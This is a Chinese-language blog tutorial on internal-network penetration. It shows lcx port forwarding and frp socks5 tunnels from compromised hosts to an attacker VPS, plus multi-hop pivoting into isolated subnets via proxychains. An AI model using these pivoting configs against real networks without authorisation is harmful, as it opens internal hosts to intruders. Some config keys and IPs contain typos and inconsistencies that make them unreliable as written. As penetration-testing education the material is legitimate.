内网渗透-隧道搭建

22 0 0

一、前言

为什么要进行代理搭建？因为目标主机会把一些可利用的端口给禁了，或者说内网的防火墙不允许这些端口出现，那么这时候就需要搭建一个隧道，什么是隧道，对于小白来说可能有点抽象，其实就是主机与攻击机之间的通讯端口，然后还会设计到端口转发或者是端口映射的问题。

端口转发一般发生在一个主机里面，将800端口的流量转到900，而端口映射一般是两个主机，比如访问A主机的800端口就相当于访问B主机的900端口。但对其并没有多大的区分。

这里介绍lcx 和frp的使用。其他不讲。

二、需要搭建代理的场景

根据场景的复杂度通常需要设置一级代代理、二级代理….如果目标无公网ip就得使用VPS

1.场景一

最简单的场景：

攻击机kali

内网：
web1: 10.10.10.13(内网地址) （192.168.8.x)外网地址
DC: 10.10.10.11（不出网）
cilent1: 10.10.10.14(内网地址，不出网)

从这可以看到我们如果想要拿下cilent1，可以通过web1主机去。因为kali又不能与cilent1通讯。所以需要搭建代理。

目标

端口转发：**比如我要控制web1的桌面，需要通过3389来控制，但是防火墙不让外部地址有3389，但是可以4444的话，那我就可以使用端口转发。使得kali访问web1的4444端口就相当于访问3389.。

**端口映射：**但是如果我想使用的是cilent的3389，那我可以将cilent的3389映射到web1的4444

1.1 使用lcx进行端口转发

web1执行：

lcx.exe -tran 4444 127.0.0.1 3389

攻击机执行

rdesktop 192.168.8.x:4444

1.2 使用lcx进行端口映射

web1执行：

lcx.exe -tran 4444 10.10.10.14 3389

攻击机执行

rdesktop 192.168.8.x:4444

2.场景二

但是如果web1没有外网地址（192.168.8.x)，只有内网地址（10.10.10.13），但是出网，可以使用frp以及vps进行搭建隧道。

这种场景搭建一级代理。

假设vps的地址为 43.143.93.88

目标：

端口转发：我要控制web1的3389，但是我只能允许4444进入。那么就可以将4444的流量转发到3389。

想ssh登录进入cilent1

frp搭建一级代理思路。在vps和web1之间搭建一个隧道，搭建这个隧道的时候对于vps会涉及到两个端口。一个是默认的7000连接frp的端口，一个是用户自定义的隧道端口。新手可能会很容易搞混这两个端口。默认的7000端口我们不用在意，只管客户端设置的remote_port.

2.1 使用frp搭建一级代理

将Vps作为服务端。把frps上传，并设置frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

web1作为客户端，配置frpc.ini

[common]
server_addr = 43.143.93.88
aerver_port = 7000

[socks5]
remote_port = 4444 #vps与web1之间的隧道端口，所有流量都通过vps的4444端口到达web1的4444端口
plugin = socks5	#vps可作为一个socks5的代理服务器。

plugin是一个插件，赋值socks5，意思是可以建立socks5代理服务器。什么意思，就是可以把它当做一个中间服务器进行传输。当然你可以都加，plugin = socks5。

然后在kali上将数据包流量扔到隧道里面。kali自带proxychains，配置proxychains.conf设置代理服务器:

socks5 43.143.93.88 4444

再运行

proxychain rdesktop 10.10.10.13:3389
或者
proxychain ssh root@10.10.10.14

这个就是把这个数据包的流量扔到vps这个代理服务器上，端口是4444，然后这个流量就会到达目标主机进行解析。

3.场景三

假设现在有另外一个主机cilent2 内网地址是10.10.20.5,可以与client1连接。但是我想在攻击机上ssh连接client2.

那么现在就必须再搭条隧道进入cilent1与cilent2所在的网段；

{%asset_image 1.png %}

3.1 frp搭建二级代理

将vps与web1作为代理服务器

vps的frps配置不变

web1 配置

frpc.ini

[common]
server_addr = 43.143.93.88
aerver_port = 7000

[socks5]
type = tcp 
local_port = 10808 #将1080隧道接受到的流量转发到10808,要转发流量，使用tcp协议。所以type=tcp
remote_port = 1080
plugin = socks5

这样第一条隧道搭建完毕。

同时它也要作为一个代理服务器，那么配置frps.ini,能在web1与cilent1之间建立一个隧道.成为第二条隧道

[common]
bind_addr = 10.10.10.13
bind_port = 7000

cilent1配置

frpc.ini

[common]
server_addr = 10.10.10.13
aerver_port = 7000

[socks5]
type = tcp #为什么要type=tcp,因为在第一条隧道的时候，数据包是tcp协议转发到10808的。
remote_port = 10808
plugin = socks5

到此两条隧道搭建完毕。

kali攻击

kali 可以通过proxchains来实现将流量包转发到vps这个第一个代理服务器，然后就会传到cilent1。

proxychains.conf配置好之后，就可以运行下面命令连接cilent2

proxychains ssh root@10.10.20.9

三级代理一样的，把cilent2加个frps.

三、frp的其他使用补充

frp进行内网穿透的时候，还有其他配置，比如，搭好隧道之后，把流量转发到22端口，就可以连接内网的22，将流量转发到其他部署有网站的端口，就可以通过vps访问到内网网站。但是一定要注意type.想连接22，就走tcp，想web，就可以走tcp也可以http.只不过http还得布置域名。

frps服务端不变。

主要是客户端frpc.ini

[common]
server_ip = 43.143.93.88
server_port = 7000

[ssh]
type = tcp
local_port =22
remote_port = 1080

[web]
type = tcp
local_port =80 #或者其他站点端口
remote_port = 4444

上述配置就可以直接通过操作43.143.93.88的相应端口来达到相关服务，比如要连接这个客户端的ssh

ssh -p 1080 root@43.143.93.88

要访问这个客户端内网的网站，直接浏览器访问http://43.143.93.88:4444就能访问。

但是如果是配置了代理服务器，搞了隧道，也就是frpc.ini的配置如下

[common]
server_ip = 43.143.93.88
server_port = 7000

[ssh]
remote_port = 1080
plugin = socks5

没有type = tcp 就不能访问。就算你配置了local_port = 22 或者88,都不能成功转发流量，也就是说，要进行端口转发流量必须加上type。

如果没加，就像上面一样，那么就是只搭建了一个代理服务器。

通过代理插件来实现。代理插件kali有proxychain，相关操作也有。代理插件或者软件的作用就是将数据包流量发送到代理服务器。

kali 直接配置文件，使用时就在命令前加上proxychain .

Windows可以使用proxifier。在设置代理服务器的时候，就可以设置 43.143.93.88 1080

再设置相应的规则就可以将流量经过代理服务器。

__EOF__

内网渗透-隧道搭建
本文作者： Traveler 本文链接： https://www.cnblogs.com/iruan/p/18214391 关于博主： 评论和私信会在第一时间回复。或者直接私信我。 版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！ 声援博主： 如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。